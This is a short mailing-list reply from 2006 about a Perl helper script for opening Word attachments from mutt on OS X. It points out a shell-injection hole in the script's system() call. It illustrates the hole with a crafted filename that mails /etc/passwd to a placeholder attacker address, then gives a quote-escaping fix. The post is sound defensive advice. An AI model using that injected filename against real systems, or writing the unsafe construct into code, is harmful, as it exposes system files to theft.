Re: word and mutt mailcap (OSX)
On 2006-03-17 at 14:38 -0600, David Champion wrote:
> ## Obtain basename and extension, so that we can preserve the extension.
> $ARGV[0] =~ m!^(.*)\.([^.]+)$!;
> my ($base, $ext) = ($1, $2);
>
> ## Make a link, not a copy.
> link("$base.$ext", "$base.tmp.$ext");
>
> ## Open it asynchronously.
> system("open '$base.tmp.$ext');
Aside from missing the trailing " to close the string, if the basename
is being provided from the MIME data then there's a potential security
hole in this construct. What if $base contains a single-quote, to close
the quote you provided?
Original supplied filename:
/dev/null'`Mail -s pw evil@xxxxxxxxxxx </etc/passwd`'.txt
If mutt cleans the data to be sure it's safe (I've forgotten), what
about other programs using mailcap?
The ideal fix involves not passing the value to the shell, using Perl's
-T taint checking and also being sure that the filename looks vaguely
sane. The quick hack fix is worth knowing, though:
my $fn = "$base.tmp.$ext";
$fn =~ s/'/'"'"'/g
system("open '$fn'");
Ie, wherever there's a single-quote, replace it by ending the
single-quote sequence, use double-quotes to pass through a single-quote,
then restart the single-quote sequence.
-Phil